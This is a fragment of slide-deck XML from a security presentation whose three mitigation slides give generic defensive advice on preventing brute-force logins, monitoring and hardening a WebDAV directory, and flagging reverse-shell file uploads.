          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Mitigation: Preventing Brute Force Attacks</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="4916520"/>
            <a:ext cx="7971480" cy="226440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="1602360"/>
            <a:ext cx="4298040" cy="3301560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="457200" tIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>A threshold limit of what is considered a high number of packet requests in a set amount of time would be able to alarm and prevent, or automatically block Brute Force Attacks. Alternatively, an alert for results of “unsuccessful login” attempts can be made to prevent too many unsuccessful logins to be undetected. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>The threshold to set an alarm for “unsuccessful logins” would be according to standard password policies with the company, possibly max limit of 5 unsuccessful per username in a 10 minute period.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>An alarm for failed requests can be set at maybe 50 per minute from the same IP address to limit the access of brute force type attacks as a human would not be able to make close to the same amount of requests unsuccessfully per minute.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466880" y="1604880"/>
            <a:ext cx="4298040" cy="3301560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="457200" tIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="950" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>There are multiple policies and practices that can be implemented to prevent brute force attacks. The following are some things or combination thereof that could be utilized: </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="950" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="950" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="950" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>-Limit failed login attempts or limit logins to a specified IP address or range and lock them out for a minimum set period of time</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="950" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="950" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>-Increase lockout time periods incrementally over more failed login attempts to the same username(s), not just IP addresses. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="950" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="950" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>-Use CAPTCHA for login pages</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="950"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en" sz="950" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>-Implement two/ multi factor authentication for all logins</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="950" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="950" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>-Implement rules for long complex passwords that do not allow short dictionary words to be used and have these changed out regularly. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="950" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="950" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="950" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>After a few failed login attempts, you may want to prompt the user not only for the username and password but also to answer a secret question along with the credentials. This helps prevent an attacker from gaining access, even if they do get the username and password correct. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="95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12240" y="0"/>
            <a:ext cx="9168120" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="274320" tIns="182880" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Mitigation: Detecting the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="4916520"/>
            <a:ext cx="7971480" cy="226440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="422" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="1602360"/>
            <a:ext cx="4298040" cy="3301560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="457200" tIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>This directory should be less accessed unless it is on predicted maintenance intervals or when there is a required update to server files for whatever reason. An alarm for any access to this directory with any credentials should be triggered so that the scheduling of access can be confirmed with a set schedule or notification from the admin. An alarm should also be triggered for any PHP or executable file upload to track possible malicious file uploads through this application to the webserver.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>This alarm  threshold should be set to 0 so that it triggers with every unsuccessful or successful login to prevent attempts for unallowed access and to verify valid access.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="423" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466880" y="1604880"/>
            <a:ext cx="4298040" cy="3301560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="457200" tIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="850" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Easiest way to protect and harden the server from WebDAV related connections is to not have WebDAV on the same server that is connected publicly for the website. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="850" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="850" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="850" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Assuming the WebDAV needs to be on the same server for whatever reason, then the safer approach is to switch over to Secure WebDAV with use of SSL. Standard WebDAV uses HTTP connections which is not safe, and by setting up WebDAV with HTTPS, it adds encryption to the traffic which secures the connection. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="850" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="850" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="850" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Another policy to implement is the “Policy of Least Privileged” for users and files. If it is an internal only WebDAV directory, only internal IPs should be allowed, and the rest blocked. Users and IP addresses can also be assigned certain folder permissions to either read-only access or read and write access depending on the user’s role. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="850" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="850" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="850" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>If the WebDAV is only used for storing files and not executing files or displaying web pages, then execute permissions should be removed from the folder(s).</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="85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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="0"/>
            <a:ext cx="9168120" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="274320" tIns="182880" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Mitigation: Identifying Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="4916520"/>
            <a:ext cx="7971480" cy="226440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="1602360"/>
            <a:ext cx="4298040" cy="3301560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="457200" tIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>All file uploads to this webserver should be done with internal networked computers. An alarm for any external network uploads should trigger an alarm. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>The threshold for this alarm should also be set to 0. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466880" y="1604880"/>
            <a:ext cx="4298040" cy="3301560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="457200" tIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Disabling file uploads altogether for WebDAV or the webserver can limit the possibility of malicious code files to be uploaded in the first place. If uploads are required as part of regular server usage, requests for proper user authentication or permissions can be requested before the upload can proceed. Uploaded files can also be quarantined to a sandbox first where a filter or malware scanner can be used to scan the file before it is allowed to be moved or executed.</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274320" y="2088360"/>
            <a:ext cx="8595000" cy="792000"/>
          </a:xfrm>
